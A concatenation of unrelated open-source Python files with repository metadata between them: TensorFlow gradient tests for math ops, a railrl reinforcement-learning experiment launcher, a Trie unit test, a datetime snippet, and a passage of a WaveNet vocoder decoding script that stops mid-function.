y = math_ops.reduce_euclidean_norm(x)
dx = tape.gradient(y, x)
dx_answer = constant_op.constant([1.0, -0.0], dtype=dtype)
self.assertAllClose(dx, dx_answer)
self.assertAllClose(1.0 / dx, 1.0 / dx_answer)
def testZeros(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([0.0, -0.0], dtype=dtype)
with backprop.GradientTape() as tape:
tape.watch(x)
y = math_ops.reduce_euclidean_norm(x)
dx = tape.gradient(y, x)
dx_answer = constant_op.constant(
[float("NaN"), float("NaN")], dtype=dtype)
self.assertAllClose(dx, dx_answer)
def test2D_1(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([[-3, 5], [7, 11]], dtype=dtype)
grads = gradient_checker_v2.compute_gradient(
math_ops.reduce_euclidean_norm, [x])
err = gradient_checker_v2.max_error(*grads)
self.assertLess(err, 1e-3)
def test2D_2(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([[-3, 5], [7, 11]], dtype=dtype)
grads = gradient_checker_v2.compute_gradient(
lambda x: math_ops.reduce_euclidean_norm(x, 0), [x])
err = gradient_checker_v2.max_error(*grads)
self.assertLess(err, 1e-3)
def test2D_3(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([[-3, 5], [7, 11]], dtype=dtype)
grads = gradient_checker_v2.compute_gradient(
lambda x: math_ops.reduce_euclidean_norm(x, 1), [x])
err = gradient_checker_v2.max_error(*grads)
self.assertLess(err, 1e-3)
def test2D_4(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([[3], [4]], dtype=dtype)
grads = gradient_checker_v2.compute_gradient(
lambda x: math_ops.reduce_euclidean_norm(x, 1), [x])
err = gradient_checker_v2.max_error(*grads)
self.assertLess(err, 1e-3)
def test3D_1(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([[[-3, 5], [7, 11]], [[13, 17], [19, 23]]],
dtype=dtype)
grads = gradient_checker_v2.compute_gradient(
math_ops.reduce_euclidean_norm, [x])
err = gradient_checker_v2.max_error(*grads)
self.assertLess(err, 2e-3)
def test3D_2(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([[[-3, 5], [7, 11]], [[13, 17], [19, 23]]],
dtype=dtype)
grads = gradient_checker_v2.compute_gradient(
lambda x: math_ops.reduce_euclidean_norm(x, 0), [x])
err = gradient_checker_v2.max_error(*grads)
self.assertLess(err, 2e-3)
def test3D_3(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([[[-3, 5], [7, 11]], [[13, 17], [19, 23]]],
dtype=dtype)
grads = gradient_checker_v2.compute_gradient(
lambda x: math_ops.reduce_euclidean_norm(x, 1), [x])
err = gradient_checker_v2.max_error(*grads)
self.assertLess(err, 3e-3)
def test3D_4(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([[[-3, 5], [7, 11]], [[13, 17], [19, 23]]],
dtype=dtype)
grads = gradient_checker_v2.compute_gradient(
lambda x: math_ops.reduce_euclidean_norm(x, 2), [x])
err = gradient_checker_v2.max_error(*grads)
self.assertLess(err, 2e-3)
class SegmentMinOrMaxGradientTest(test.TestCase):
@test_util.run_deprecated_v1
def testSegmentMinGradient(self):
data = constant_op.constant([1.0, 2.0, 3.0], dtype=dtypes.float32)
segment_ids = constant_op.constant([0, 0, 1], dtype=dtypes.int64)
segment_min = math_ops.segment_min(data, segment_ids)
with self.cached_session():
error = gradient_checker.compute_gradient_error(data, [3], segment_min,
[2])
self.assertLess(error, 1e-4)
@test_util.run_deprecated_v1
def testSegmentMaxGradient(self):
data = constant_op.constant([1.0, 2.0, 3.0], dtype=dtypes.float32)
segment_ids = constant_op.constant([0, 0, 1], dtype=dtypes.int64)
segment_max = math_ops.segment_max(data, segment_ids)
with self.cached_session():
error = gradient_checker.compute_gradient_error(data, [3], segment_max,
[2])
self.assertLess(error, 1e-4)
@test_util.run_deprecated_v1
def testSegmentMinGradientWithTies(self):
inputs = constant_op.constant([1.0], dtype=dtypes.float32)
data = array_ops.concat([inputs, inputs], 0)
segment_ids = constant_op.constant([0, 0], dtype=dtypes.int64)
segment_min = math_ops.segment_min(data, segment_ids)
with self.cached_session():
error = gradient_checker.compute_gradient_error(inputs, [1], segment_min,
[1])
self.assertLess(error, 1e-4)
@test_util.run_deprecated_v1
def testSegmentMaxGradientWithTies(self):
inputs = constant_op.constant([1.0], dtype=dtypes.float32)
data = array_ops.concat([inputs, inputs], 0)
segment_ids = constant_op.constant([0, 0], dtype=dtypes.int64)
segment_max = math_ops.segment_max(data, segment_ids)
with self.cached_session():
error = gradient_checker.compute_gradient_error(inputs, [1], segment_max,
[1])
self.assertLess(error, 1e-4)
class FloorModGradientTest(test.TestCase):
@test_util.run_deprecated_v1
def testFloorModGradient(self):
# Making sure the input is not near the discontinuity point where
# x/y == floor(x/y)
ns = constant_op.constant([17.], dtype=dtypes.float32)
inputs = constant_op.constant([131.], dtype=dtypes.float32)
floor_mod = math_ops.floormod(inputs, ns)
with self.cached_session():
error = gradient_checker.compute_gradient_error(inputs, [1],
floor_mod, [1])
self.assertLess(error, 1e-4)
class DivNoNanGradientTest(test.TestCase):
@test_util.run_deprecated_v1
def testBasicGradient(self):
inputs = constant_op.constant(np.arange(-3, 3),
dtype=dtypes.float32)
outputs = math_ops.div_no_nan(inputs, 1 + math_ops.abs(inputs))
with self.cached_session():
error = gradient_checker.compute_gradient_error(
inputs,
inputs.get_shape().as_list(), outputs,
outputs.get_shape().as_list())
self.assertLess(error, 1e-4)
@test_util.run_deprecated_v1
def testGradientWithDenominatorIsZero(self):
x = constant_op.constant(np.arange(-3, 3),
dtype=dtypes.float32)
y = array_ops.zeros_like(x,
dtype=dtypes.float32)
outputs = math_ops.div_no_nan(x, y)
with self.cached_session():
dx, dy = gradients.gradients(outputs, [x, y])
self.assertAllClose(dx.eval(), np.zeros(x.shape.as_list()))
self.assertAllClose(dy.eval(), np.zeros(y.shape.as_list()))
class MulNoNanGradientTest(test.TestCase):
@test_util.run_deprecated_v1
def testBasicGradient(self):
inputs = constant_op.constant(np.arange(-3, 3), dtype=dtypes.float32)
outputs = math_ops.mul_no_nan(inputs, 1 + math_ops.abs(inputs))
with self.cached_session():
error = gradient_checker.compute_gradient_error(
inputs,
inputs.get_shape().as_list(), outputs,
outputs.get_shape().as_list())
self.assertLess(error, 1e-4)
@test_util.run_deprecated_v1
def testGradientWithRhsIsZero(self):
x_vals = [0, 1.0, np.nan, np.inf, np.NINF]
x = constant_op.constant(x_vals, dtype=dtypes.float32)
y = array_ops.zeros_like(x, dtype=dtypes.float32)
outputs = math_ops.mul_no_nan(x, y)
with self.cached_session():
dx, dy = gradients.gradients(outputs, [x, y])
self.assertAllClose(dx.eval(), np.zeros(x.shape.as_list()))
self.assertAllClose(dy.eval(), x_vals)
class XlogyTest(test.TestCase):
def _xlogy_gradients(self, x, y):
xlogy_xgrad = self.evaluate(gradients.gradients(math_ops.xlogy(x, y), x)[0])
xlogy_ygrad = self.evaluate(gradients.gradients(math_ops.xlogy(x, y), y)[0])
return xlogy_xgrad, xlogy_ygrad
@test_util.run_deprecated_v1
def testNonZeroValuesGrad(self):
for dtype in [dtypes.float16, dtypes.float32, dtypes.float64]:
x = constant_op.constant(0.1, dtype=dtype)
y = constant_op.constant(3.1, dtype=dtype)
xlogy_xgrad, xlogy_ygrad = self._xlogy_gradients(x, y)
xlogy_expected_xgrad = self.evaluate(math_ops.log(y))
xlogy_expected_ygrad = self.evaluate(x / y)
self.assertAllClose(xlogy_expected_xgrad, xlogy_xgrad)
self.assertAllClose(xlogy_expected_ygrad, xlogy_ygrad)
@test_util.run_deprecated_v1
def testZeroXGrad(self):
for dtype in [dtypes.float16, dtypes.float32, dtypes.float64]:
x = constant_op.constant(0., dtype=dtype)
y = constant_op.constant(3.1, dtype=dtype)
xlogy_xgrad, xlogy_ygrad = self._xlogy_gradients(x, y)
zero = self.evaluate(x)
self.assertAllClose(zero, xlogy_xgrad)
self.assertAllClose(zero, xlogy_ygrad)
@test_util.run_deprecated_v1
def testZeroYGrad(self):
for dtype in [dtypes.float16, dtypes.float32, dtypes.float64]:
x = constant_op.constant(0.1, dtype=dtype)
y = constant_op.constant(0., dtype=dtype)
xlogy_xgrad, xlogy_ygrad = self._xlogy_gradients(x, y)
self.assertAllClose(-np.inf, xlogy_xgrad)
self.assertAllClose(np.inf, xlogy_ygrad)
@test_util.run_deprecated_v1
def testZeroXYGrad(self):
for dtype in [dtypes.float16, dtypes.float32, dtypes.float64]:
x = constant_op.constant(0., dtype=dtype)
y = constant_op.constant(0., dtype=dtype)
xlogy_xgrad, xlogy_ygrad = self._xlogy_gradients(x, y)
zero = self.evaluate(x)
self.assertAllClose(zero, xlogy_xgrad)
self.assertAllClose(zero, xlogy_ygrad)
class Xlog1pyTest(test.TestCase):
def _xlog1py_gradients(self, x, y):
xlog1py_xgrad = self.evaluate(
gradients.gradients(math_ops.xlog1py(x, y), x)[0])
xlog1py_ygrad = self.evaluate(
gradients.gradients(math_ops.xlog1py(x, y), y)[0])
return xlog1py_xgrad, xlog1py_ygrad
@test_util.run_deprecated_v1
def testNonZeroValuesGrad(self):
for dtype in [dtypes.float16, dtypes.float32, dtypes.float64]:
x = constant_op.constant(0.1, dtype=dtype)
y = constant_op.constant(3.1, dtype=dtype)
xlog1py_xgrad, xlog1py_ygrad = self._xlog1py_gradients(x, y)
xlog1py_expected_xgrad = self.evaluate(math_ops.log1p(y))
xlog1py_expected_ygrad = self.evaluate(x / (1. + y))
self.assertAllClose(xlog1py_expected_xgrad, xlog1py_xgrad)
self.assertAllClose(xlog1py_expected_ygrad, xlog1py_ygrad)
@test_util.run_deprecated_v1
def testZeroXGrad(self):
for dtype in [dtypes.float16, dtypes.float32, dtypes.float64]:
x = constant_op.constant(0., dtype=dtype)
y = constant_op.constant(3.1, dtype=dtype)
xlog1py_xgrad, xlog1py_ygrad = self._xlog1py_gradients(x, y)
zero = self.evaluate(x)
self.assertAllClose(zero, xlog1py_xgrad)
self.assertAllClose(zero, xlog1py_ygrad)
@test_util.run_deprecated_v1
def testNegOneYGrad(self):
for dtype in [dtypes.float16, dtypes.float32, dtypes.float64]:
x = constant_op.constant(0.1, dtype=dtype)
y = constant_op.constant(-1., dtype=dtype)
xlog1py_xgrad, xlog1py_ygrad = self._xlog1py_gradients(x, y)
self.assertAllClose(-np.inf, xlog1py_xgrad)
self.assertAllClose(np.inf, xlog1py_ygrad)
@test_util.run_deprecated_v1
def testZeroXNegOneYGrad(self):
for dtype in [dtypes.float16, dtypes.float32, dtypes.float64]:
x = constant_op.constant(0., dtype=dtype)
y = constant_op.constant(-1., dtype=dtype)
xlog1py_xgrad, xlog1py_ygrad = self._xlog1py_gradients(x, y)
zero = self.evaluate(x)
self.assertAllClose(zero, xlog1py_xgrad)
self.assertAllClose(zero, xlog1py_ygrad)
class XdivyTest(test.TestCase):
def _xdivy_gradients(self, x, y):
xdivy_xgrad = self.evaluate(gradients.gradients(math_ops.xdivy(x, y), x)[0])
xdivy_ygrad = self.evaluate(gradients.gradients(math_ops.xdivy(x, y), y)[0])
return xdivy_xgrad, xdivy_ygrad
@test_util.run_deprecated_v1
def testNonZeroValuesGrad(self):
for dtype in [dtypes.float16, dtypes.float32, dtypes.float64]:
x = constant_op.constant(0.1, dtype=dtype)
y = constant_op.constant(3.1, dtype=dtype)
xdivy_xgrad, xdivy_ygrad = self._xdivy_gradients(x, y)
xdivy_expected_xgrad = self.evaluate(1 / y)
xdivy_expected_ygrad = self.evaluate(-x / y**2)
self.assertAllClose(xdivy_expected_xgrad, xdivy_xgrad)
self.assertAllClose(xdivy_expected_ygrad, xdivy_ygrad)
@test_util.run_deprecated_v1
def testZeroXGrad(self):
for dtype in [dtypes.float16, dtypes.float32, dtypes.float64]:
x = constant_op.constant(0., dtype=dtype)
y = constant_op.constant(3.1, dtype=dtype)
xdivy_xgrad, xdivy_ygrad = self._xdivy_gradients(x, y)
zero = self.evaluate(x)
self.assertAllClose(zero, xdivy_xgrad)
self.assertAllClose(zero, xdivy_ygrad)
@test_util.run_deprecated_v1
def testZeroYGrad(self):
for dtype in [dtypes.float16, dtypes.float32, dtypes.float64]:
x = constant_op.constant(0.1, dtype=dtype)
y = constant_op.constant(0., dtype=dtype)
xdivy_xgrad, xdivy_ygrad = self._xdivy_gradients(x, y)
self.assertAllClose(np.inf, xdivy_xgrad)
self.assertAllClose(-np.inf, xdivy_ygrad)
@test_util.run_deprecated_v1
def testZeroXYGrad(self):
for dtype in [dtypes.float16, dtypes.float32, dtypes.float64]:
x = constant_op.constant(0., dtype=dtype)
y = constant_op.constant(0., dtype=dtype)
xdivy_xgrad, xdivy_ygrad = self._xdivy_gradients(x, y)
zero = self.evaluate(x)
self.assertAllClose(zero, xdivy_xgrad)
self.assertAllClose(zero, xdivy_ygrad)
@test_util.run_all_in_graph_and_eager_modes
class PowGradTest(test.TestCase):
def test_zero_grad_tf_gradients(self):
if context.executing_eagerly():
self.skipTest("tf.gradients not supported in eager.")
x = constant_op.constant([-1., 0., 1.])
g = self.evaluate(gradients.gradients(math_ops.pow(x, 2), x)[0])
self.assertAllClose([-2., 0., 2.], g)
def test_zero_grad_tape(self):
try:
check_numerics_callback.enable_check_numerics()
x = constant_op.constant([-1, 0., 1.])
with backprop.GradientTape() as tape:
tape.watch(x)
g = tape.gradient(math_ops.pow(x, 2), x)
g = self.evaluate(g)
self.assertAllClose([-2., 0., 2.], g)
finally:
check_numerics_callback.disable_check_numerics()
@test_util.run_all_in_graph_and_eager_modes
class NextAfterTest(test.TestCase):
def _nextafter_gradient(self, x1, x2):
with backprop.GradientTape() as tape:
tape.watch(x1)
tape.watch(x2)
y = math_ops.nextafter(x1, x2)
return tape.gradient(y, [x1, x2])
def testBasic(self):
for dtype in [dtypes.float32, dtypes.float64]:
x1 = constant_op.constant(0.1, dtype=dtype)
x2 = constant_op.constant(3.1, dtype=dtype)
dx1, dx2 = self._nextafter_gradient(x1, x2)
expected_dx1 = constant_op.constant(1, dtype=dtype)
expected_dx2 = constant_op.constant(0, dtype=dtype)
self.assertAllClose(expected_dx1, dx1)
self.assertAllClose(expected_dx2, dx2)
def testDynamicShapes(self):
for dtype in [dtypes.float32, dtypes.float64]:
default_x1 = constant_op.constant(0.1, dtype=dtype)
default_x2 = constant_op.constant(3.1, dtype=dtype)
x1 = array_ops.placeholder_with_default(default_x1, shape=None)
x2 = array_ops.placeholder_with_default(default_x2, shape=None)
dx1, dx2 = self._nextafter_gradient(x1, x2)
expected_dx1 = constant_op.constant(1, dtype=dtype)
expected_dx2 = constant_op.constant(0, dtype=dtype)
self.assertAllClose(expected_dx1, dx1)
self.assertAllClose(expected_dx2, dx2)
def testWithGradientChecker(self):
for dtype in [dtypes.float32, dtypes.float64]:
with self.cached_session():
x1 = np.array([-1, 0, 1, 2, 3], dtype=dtype.as_numpy_dtype)
x2 = np.array([2, 2, 2, 2, 2], dtype=dtype.as_numpy_dtype)
err = gradient_checker_v2.max_error(
*gradient_checker_v2.compute_gradient(
lambda x: math_ops.nextafter(x, x2), [x1])) # pylint: disable=cell-var-from-loop
self.assertLess(err, 1e-3)
def testBroadcastingWithGradientChecker(self):
for dtype in [dtypes.float32, dtypes.float64]:
with self.cached_session():
x1 = np.array([-1, 0, 1, 2, 3], dtype=dtype.as_numpy_dtype)
x2 = np.array([2], dtype=dtype.as_numpy_dtype)
err = gradient_checker_v2.max_error(
*gradient_checker_v2.compute_gradient(
lambda x: math_ops.nextafter(x, x2), [x1])) # pylint: disable=cell-var-from-loop
self.assertLess(err, 1e-3)
if __name__ == "__main__":
test.main()
| 39.699552
| 97
| 0.680108
|
4a07d2a4ce8c4b81c551dea0466994b0ceeade50
| 4,127
|
py
|
Python
|
experiments/vitchyr/rig/reset-free/pusher_xyz_many_objs/online_vae.py
|
Asap7772/rail-rl-franka-eval
|
4bf99072376828193d05b53cf83c7e8f4efbd3ba
|
[
"MIT"
] | null | null | null |
experiments/vitchyr/rig/reset-free/pusher_xyz_many_objs/online_vae.py
|
Asap7772/rail-rl-franka-eval
|
4bf99072376828193d05b53cf83c7e8f4efbd3ba
|
[
"MIT"
] | null | null | null |
experiments/vitchyr/rig/reset-free/pusher_xyz_many_objs/online_vae.py
|
Asap7772/rail-rl-franka-eval
|
4bf99072376828193d05b53cf83c7e8f4efbd3ba
|
[
"MIT"
] | null | null | null |
import railrl.misc.hyperparameter as hyp
from multiworld.envs.mujoco.cameras import sawyer_pusher_camera_upright_v2
from multiworld.envs.mujoco.sawyer_xyz.sawyer_push_many_env import (
SawyerPushManyXyEnv,
)
from railrl.launchers.launcher_util import run_experiment
from railrl.torch.grill.launcher import grill_her_td3_online_vae_full_experiment
import railrl.torch.vae.vae_schedules as vae_schedules
if __name__ == "__main__":
variant = dict(
double_algo=False,
env_class=SawyerPushManyXyEnv,
env_kwargs=dict(
hide_goal_markers=True,
reset_free=False,
randomize_num_objects=False,
),
init_camera=sawyer_pusher_camera_upright_v2,
grill_variant=dict(
save_video=True,
online_vae_beta=2.5,
save_video_period=250,
qf_kwargs=dict(
hidden_sizes=[400, 300],
),
policy_kwargs=dict(
hidden_sizes=[400, 300],
),
algo_kwargs=dict(
base_kwargs=dict(
num_epochs=1000,
num_steps_per_epoch=1000,
num_steps_per_eval=5000,
min_num_steps_before_training=4000,
batch_size=128,
max_path_length=100,
discount=0.99,
num_updates_per_env_step=2,
),
td3_kwargs=dict(
tau=1e-2,
),
online_vae_kwargs=dict(
vae_training_schedule=vae_schedules.every_six,
oracle_data=False,
vae_save_period=25,
),
),
replay_kwargs=dict(
max_size=int(30000),
fraction_goals_are_rollout_goals=0.,
fraction_resampled_goals_are_env_goals=0.5,
exploration_rewards_scale=0.0,
exploration_rewards_type='reconstruction_error',
alpha=3,
),
algorithm='GRILL-HER-TD3',
normalize=False,
render=False,
exploration_noise=0.8,
exploration_type='ou',
training_mode='train',
testing_mode='test',
reward_params=dict(
type='latent_distance',
),
observation_key='latent_observation',
desired_goal_key='latent_desired_goal',
),
train_vae_variant=dict(
representation_size=16,
beta=1.0,
num_epochs=0,
generate_vae_dataset_kwargs=dict(
N=100,
test_p=.9,
oracle_dataset=True,
use_cached=False,
num_channels=3,
),
vae_kwargs=dict(
input_channels=3,
),
algo_kwargs=dict(
do_scatterplot=False,
use_linear_dynamics=False,
lr=1e-3,
),
save_period=5,
),
version='easy-env',
)
search_space = {
'env_kwargs.num_resets_before_puck_reset': [1],
'grill_variant.algo_kwargs.base_kwargs.max_path_length': [500],
'grill_variant.replay_kwargs.power': [3],
}
sweeper = hyp.DeterministicHyperparameterSweeper(
search_space, default_parameters=variant,
)
n_seeds = 1
mode = 'local'
exp_prefix = 'dev'
n_seeds = 3
mode = 'ec2'
exp_prefix = 'vitchyr-sawyer-multipush-xy-online-reset-hand-with-puck' \
'-broken-sample-goals-still'
for exp_id, variant in enumerate(sweeper.iterate_hyperparameters()):
for _ in range(n_seeds):
run_experiment(
grill_her_td3_online_vae_full_experiment,
exp_prefix=exp_prefix,
mode=mode,
variant=variant,
use_gpu=True,
snapshot_gap=200,
snapshot_mode='gap_and_last',
num_exps_per_instance=2,
)
| 33.282258
| 80
| 0.542767
|
4a07d355293680de3d819e97122de65349434919
| 592
|
py
|
Python
|
tests/test_trie.py
|
scottwedge/Python-Datastructures
|
3ea489ac54c64d57fe25d974250bf19fa5f8898d
|
[
"MIT"
] | null | null | null |
tests/test_trie.py
|
scottwedge/Python-Datastructures
|
3ea489ac54c64d57fe25d974250bf19fa5f8898d
|
[
"MIT"
] | null | null | null |
tests/test_trie.py
|
scottwedge/Python-Datastructures
|
3ea489ac54c64d57fe25d974250bf19fa5f8898d
|
[
"MIT"
] | null | null | null |
import unittest
from python_datastructures.trie import Trie
class Test_Trie(unittest.TestCase):
def setUp(self):
words = ['apple', 'app', 'android', 'and']
self.trie = Trie()
self.trie.build(words)
def test_add(self):
self.trie.add("amazon")
self.assertEqual(self.trie.wordcount, 5)
def test_contains(self):
self.assertEqual(self.trie.contains("app"), True)
self.assertEqual(self.trie.contains("amazon"), False)
self.assertEqual(self.trie.contains("ap"), True)
if __name__ == "__main__":
unittest.main()
| 23.68
| 61
| 0.641892
|
4a07d3c52852ea729f862476ab0c3adb5fc47adb
| 157
|
py
|
Python
|
01_Language/01_Functions/python/date_date_set.py
|
cliff363825/TwentyFour
|
09df59bd5d275e66463e343647f46027397d1233
|
[
"MIT"
] | 3
|
2020-06-28T07:42:51.000Z
|
2021-01-15T10:32:11.000Z
|
01_Language/01_Functions/python/date_date_set.py
|
cliff363825/TwentyFour
|
09df59bd5d275e66463e343647f46027397d1233
|
[
"MIT"
] | 9
|
2021-03-10T22:45:40.000Z
|
2022-02-27T06:53:20.000Z
|
01_Language/01_Functions/python/date_date_set.py
|
cliff363825/TwentyFour
|
09df59bd5d275e66463e343647f46027397d1233
|
[
"MIT"
] | 1
|
2021-01-15T10:51:24.000Z
|
2021-01-15T10:51:24.000Z
|
# coding: utf-8
import datetime
if __name__ == '__main__':
d = datetime.datetime.now()
d = d.replace(2001, 2, 3)
print(d.strftime("%Y-%m-%d"))
| 17.444444
| 33
| 0.598726
|
4a07d4916f78db80fac2c116e5cc938e01dadfbb
| 15,729
|
py
|
Python
|
decode.py
|
exeex/PytorchWaveNetVocoder
|
c21556026ebeac4fdb9e2f4ccb707d7db23114f2
|
[
"Apache-2.0"
] | null | null | null |
decode.py
|
exeex/PytorchWaveNetVocoder
|
c21556026ebeac4fdb9e2f4ccb707d7db23114f2
|
[
"Apache-2.0"
] | null | null | null |
decode.py
|
exeex/PytorchWaveNetVocoder
|
c21556026ebeac4fdb9e2f4ccb707d7db23114f2
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2017 Tomoki Hayashi (Nagoya University)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
import argparse
import logging
import math
import os
import sys
import numpy as np
import soundfile as sf
import torch
import torch.multiprocessing as mp
from sklearn.preprocessing import StandardScaler
from torchvision import transforms
from torchvision import transforms
from wavenet_vocoder.nets.wavenet_utils import decode_mu_law
from wavenet_vocoder.nets.wavenet_utils import encode_mu_law
from wavenet_vocoder.nets import WaveNet
from wavenet_vocoder.nets.wavenet_pulse import WaveNetPulse
from wavenet_vocoder.utils import extend_time
from wavenet_vocoder.utils import find_files
from wavenet_vocoder.utils import read_hdf5
from wavenet_vocoder.utils import read_txt
from wavenet_vocoder.utils import shape_hdf5
from dataset import p_trans_binary, p_trans_binary_multi_channel
from functools import partial
import pulse_world.pyworld as pw
def shift_semi_tone_f0_pulse(f0, shift=2):
freq_scale = 2 ** (shift / 12)
# print(f0.max())
f0[:] = f0[:] * freq_scale
# print(f0.max())
return f0
def pad_list(batch_list, pad_value=0.0):
"""PAD VALUE.
Args:
batch_list (list): List of batch, where the shape of i-th batch (T_i, C).
pad_value (float): Value to pad.
Returns:
ndarray: Padded batch with the shape (B, T_max, C).
"""
batch_size = len(batch_list)
maxlen = max([batch.shape[0] for batch in batch_list])
n_feats = batch_list[0].shape[-1]
batch_pad = np.zeros((batch_size, maxlen, n_feats))
for idx, batch in enumerate(batch_list):
batch_pad[idx, :batch.shape[0]] = batch
return batch_pad
def pad_along_axis(array: np.ndarray, target_length, axis=0):
pad_size = target_length - array.shape[axis]
axis_nb = len(array.shape)
if pad_size < 0:
return array.take(indices=range(target_length), axis=axis)
npad = [(0, 0) for _ in range(axis_nb)]
npad[axis] = (0, pad_size)
b = np.pad(array, pad_width=npad, mode='constant', constant_values=0)
return b
def decode_generator(feat_list,
batch_size=32,
feature_type="world",
wav_transform=None,
feat_transform=None,
pulse_transform=p_trans_binary_multi_channel,
upsampling_factor=80,
use_upsampling_layer=True,
use_speaker_code=False,
use_pulse=True,
f0_transform=None, ):
"""GENERATE DECODING BATCH.
Args:
feat_list (list): List of feature files.
batch_size (int): Batch size in decoding.
feature_type (str): Feature type.
wav_transform (func): Preprocessing function for waveform.
feat_transform (func): Preprocessing function for aux feats.
upsampling_factor (int): Upsampling factor.
use_upsampling_layer (bool): Whether to use upsampling layer.
use_speaker_code (bool): Whether to use speaker code>
Returns:
generator: Generator instance.
"""
# ---------------------------
# sample-by-sample generation
# ---------------------------
if batch_size == 1:
raise NotImplementedError
# ----------------
# batch generation
# ----------------
else:
# sort with the feature length
shape_list = [shape_hdf5(f, "/" + feature_type)[0] for f in feat_list]
idx = np.argsort(shape_list)
feat_list = [feat_list[i] for i in idx]
# divide into batch list
n_batch = math.ceil(len(feat_list) / batch_size)
batch_lists = np.array_split(feat_list, n_batch)
batch_lists = [f.tolist() for f in batch_lists]
for batch_list in batch_lists:
batch_x = []
batch_h = []
batch_p = []
n_samples_list = []
feat_ids = []
for featfile in batch_list:
# make seed waveform and load aux feature
x = np.zeros((1))
h = read_hdf5(featfile, "/" + feature_type)
if f0_transform is not None:
f0 = read_hdf5(featfile, "/" + 'world_f0')
f0 = f0_transform(f0)
fs = args.fs
p = pw.synthesize_pulse_new(f0, fs, frame_period=args.shiftms).astype(np.int32)
__p = read_hdf5(featfile, "/" + 'world_pulse')
assert len(p) == len(__p)
else:
p = read_hdf5(featfile, "/" + 'world_pulse')
if pulse_transform is not None:
p = pulse_transform(p)
assert p.max() <= 1.0
if not use_upsampling_layer:
h = extend_time(h, upsampling_factor)
if use_speaker_code:
sc = read_hdf5(featfile, "/speaker_code")
sc = np.tile(sc, [h.shape[0], 1])
h = np.concatenate([h, sc], axis=1)
# perform pre-processing
if wav_transform is not None:
x = wav_transform(x)
if feat_transform is not None:
h = feat_transform(h)
if use_pulse:
h = np.concatenate([h[:, 0:1], h[:, 2:]], axis=1) # remove cont_f0_lpf
# append to list
batch_x += [x]
batch_h += [h]
batch_p += [p]
if not use_upsampling_layer:
n_samples_list += [h.shape[0] - 1]
else:
n_samples_list += [h.shape[0] * upsampling_factor - 1]
feat_ids += [os.path.basename(featfile).replace(".h5", "")]
# convert list to ndarray
batch_x = np.stack(batch_x, axis=0)
len_p_max = max([len(p) for p in batch_p])
batch_p = [pad_along_axis(p, len_p_max, axis=0) for p, n_sample in zip(batch_p, n_samples_list)]
batch_p = np.stack(batch_p)
batch_h = pad_list(batch_h)
# convert to torch variable
batch_x = torch.from_numpy(batch_x).long() # B, 1
batch_p = torch.from_numpy(batch_p).float().transpose(1, 2) # B, C=1, T
batch_h = torch.from_numpy(batch_h).float().transpose(1, 2) # B, C, T(Frame)
# print(batch_x.shape, batch_p.shape, batch_h.shape)
# send to cuda
if torch.cuda.is_available():
batch_x = batch_x.cuda()
batch_h = batch_h.cuda()
batch_p = batch_p.cuda()
yield feat_ids, (batch_x, batch_h, batch_p, n_samples_list)
# pulse
"""
--checkpoint /home/cswu/research/PytorchWaveNetVocoder/egs/arctic/sdp/exp/pulse_repeat1_1227/checkpoint-200000.pkl
--feats /home/cswu/research/PytorchWaveNetVocoder/egs/arctic/sdp/hdf5/ev_slt
--outdir eva_out_pulse1228
--stats /home/cswu/research/PytorchWaveNetVocoder/egs/arctic/sdp/data/tr_slt/stats.h5
--config /home/cswu/research/PytorchWaveNetVocoder/egs/arctic/sdp/exp/pulse_repeat1_1227/model.conf
--use_pulse
--f0_shift 0
"""
# no pulse repeat1
"""
--checkpoint /home/cswu/research/PytorchWaveNetVocoder/no_pulse_repeat1/checkpoint-200000.pkl
--config /home/cswu/research/PytorchWaveNetVocoder/no_pulse_repeat1/model.conf
--outdir eva_out_no_pulse
--feats /home/cswu/research/PytorchWaveNetVocoder/egs/arctic/sd/hdf5/ev_slt
--stats /home/cswu/research/PytorchWaveNetVocoder/egs/arctic/sd/data/tr_slt/stats.h5
"""
# no pulse repeat3
"""
--checkpoint /home/cswu/research/PytorchWaveNetVocoder/no_pulse_repeat3/checkpoint-200000.pkl
--config /home/cswu/research/PytorchWaveNetVocoder/no_pulse_repeat3/model.conf
--outdir eva_out_no_pulse_repeat3
--feats /home/cswu/research/PytorchWaveNetVocoder/egs/arctic/sd/hdf5/ev_slt
--stats /home/cswu/research/PytorchWaveNetVocoder/egs/arctic/sd/data/tr_slt/stats.h5
"""
def parse_args():
parser = argparse.ArgumentParser()
# decode setting
parser.add_argument("--feats", required=True,
type=str, help="list or directory of aux feat files")
parser.add_argument("--checkpoint", required=True,
type=str, help="model file")
parser.add_argument("--outdir", required=True,
type=str, help="directory to save generated samples")
parser.add_argument("--stats", default=None,
type=str, help="hdf5 file including statistics")
parser.add_argument("--config", default=None,
type=str, help="configure file")
parser.add_argument("--fs", default=16000,
type=int, help="sampling rate")
parser.add_argument("--shiftms", default=5,
type=float, help="Frame shift in msec")
parser.add_argument("--batch_size", default=32,
type=int, help="number of batch size in decoding")
parser.add_argument("--n_gpus", default=1,
type=int, help="number of gpus")
parser.add_argument("--use_pulse", default=False, action='store_true', help="using pulse signal")
parser.add_argument("--f0_shift", required=True,
type=int, help="f0 shift semi tone")
# other setting
parser.add_argument("--intervals", default=1000,
type=int, help="log interval")
parser.add_argument("--seed", default=1,
type=int, help="seed number")
parser.add_argument("--verbose", default=1,
type=int, help="log level")
args = parser.parse_args()
return args
def main(args):
"""RUN DECODING."""
# set log level
if args.verbose > 0:
logging.basicConfig(level=logging.INFO,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S')
elif args.verbose > 1:
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S')
else:
logging.basicConfig(level=logging.WARNING,
